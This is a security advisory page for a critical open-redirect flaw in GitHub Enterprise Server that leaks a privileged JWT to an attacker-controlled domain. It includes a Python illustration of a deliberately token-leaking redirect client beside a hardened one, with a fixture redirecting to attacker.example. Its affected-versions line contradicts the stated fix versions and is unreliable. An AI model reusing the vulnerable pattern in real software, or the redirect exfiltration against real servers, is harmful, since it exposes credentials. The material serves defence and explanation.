Cyber Posture

CVE-2026-0573

Severity: Critical
Published: 18 February 2026
Modified: 19 February 2026
KEV Added: not listed
Patch: available (fixed versions listed below)
CVSS Score: 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)
EPSS Score: 0.0007 (20.6th percentile)
Risk Priority: 18 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2026-0573 is a critical-severity Open Redirect (CWE-601) vulnerability in GitHub Enterprise Server. Its CVSS base score is 9.0 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it at the 20.6th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190). What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)

SI-2 Flaw Remediation (prevent): Timely flaw remediation directly patches the insecure HTTP redirect handling in the repository_pages API, preventing authorization token leakage.

SI-10 Information Input Validation (prevent): Validating artifact URLs and HTTP redirects ensures only trusted domains are followed, blocking attacker-controlled redirects.

SC-7 Boundary Protection (prevent): Boundary protection mechanisms inspect and filter outbound API requests to unauthorized domains, mitigating redirect-based token exfiltration.

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access): Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

An open redirect in the public-facing GitHub Enterprise Server API directly enables exploitation of the server to steal JWT tokens (T1190).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

A URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.

Deeper analysis

CVE-2026-0573 is an open URL redirection vulnerability (CWE-601) in GitHub Enterprise Server's repository_pages API. The API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header that contained a privileged JWT. This issue affected all versions of GitHub Enterprise Server prior to 3.19.

An authenticated user with access to the target GitHub Enterprise Server instance could exploit this vulnerability by leveraging a legacy redirect mechanism to direct requests to an attacker-controlled domain. This allowed the attacker to exfiltrate the Actions.ManageOrgs JWT from the preserved authorization header, which could then be leveraged for potential remote code execution.

GitHub addressed the vulnerability in backported patches across multiple release branches, including versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. Security practitioners should upgrade to one of these fixed versions, as detailed in the corresponding GitHub Enterprise Server release notes. The issue was reported through the GitHub Bug Bounty program.
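The failure mode described above, as an added illustration (not GitHub's code): a redirect-following fetch that re-sends the Authorization header to whatever host the Location header names, beside a hardened variant that only follows redirects to allowlisted hosts and drops the Authorization header on any origin change. The hosts, URLs and token are constructed for the example.

```python
from urllib.parse import urljoin, urlparse

REDIRECTS = (301, 302, 303, 307, 308)

# Constructed in-memory "web": url -> (status, response headers, body). All hosts are hypothetical.
FAKE_WEB = {
    "https://ghes.example.internal/artifacts/42":
        (302, {"Location": "https://attacker.example/collect"}, b""),
    "https://attacker.example/collect": (200, {}, b"nothing useful"),
    "https://ghes.example.internal/artifacts/43":
        (302, {"Location": "https://artifacts.example.internal/blob/43"}, b""),
    "https://artifacts.example.internal/blob/43": (200, {}, b"artifact-bytes"),
}
SEEN = []  # (host, Authorization value) for every request made: our leak detector

def fake_get(url, headers):
    """Stand-in for an HTTP GET; records which host saw which Authorization header."""
    SEEN.append((urlparse(url).hostname, headers.get("Authorization")))
    return FAKE_WEB[url]

def auth_seen_by(host):
    """Authorization values a given host received, in request order."""
    return [auth for h, auth in SEEN if h == host]

def naive_fetch(url, headers, get=fake_get, max_hops=5):
    """Vulnerable pattern: every hop re-sends the full header set, JWT included."""
    for _ in range(max_hops):
        status, resp_headers, body = get(url, headers)
        if status not in REDIRECTS:
            return url, body
        url = urljoin(url, resp_headers["Location"])
    raise RuntimeError("too many redirects")

def hardened_fetch(url, headers, allowed_hosts, get=fake_get, max_hops=5):
    """Follow redirects only to allowlisted hosts (SI-10 style validation) and never
    carry the Authorization header across an origin change (defence in depth)."""
    origin_host = urlparse(url).hostname
    for _ in range(max_hops):
        status, resp_headers, body = get(url, headers)
        if status not in REDIRECTS:
            return url, body
        target = urljoin(url, resp_headers["Location"])  # handles relative Location too
        target_host = urlparse(target).hostname
        if target_host not in allowed_hosts:
            raise ValueError(f"refusing redirect to untrusted host {target_host!r}")
        if target_host != origin_host:
            headers = {k: v for k, v in headers.items() if k.lower() != "authorization"}
        url = target
    raise RuntimeError("too many redirects")
```

Running both fetchers against the constructed redirect to attacker.example shows the naive client handing over the token while the hardened one refuses the hop; the redirect to the allowlisted artifact host succeeds but arrives without the Authorization header.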

Details

CWE(s): CWE-601 (Open Redirect)

Affected Products: GitHub Enterprise Server ≤ 3.14.22 · 3.15.0 to 3.15.17 · 3.16.0 to 3.16.13

CVEs Like This One

CVE-2026-3854: same product (GitHub Enterprise Server)
CVE-2026-5845: same product (GitHub Enterprise Server)
CVE-2026-5921: same product (GitHub Enterprise Server)
CVE-2024-10001: same product (GitHub Enterprise Server)
CVE-2025-23369: same product (GitHub Enterprise Server)
CVE-2025-50067: shared CWE-601
CVE-2026-0508: shared CWE-601
CVE-2026-40905: shared CWE-601
CVE-2026-28512: shared CWE-601
CVE-2025-25198: shared CWE-601
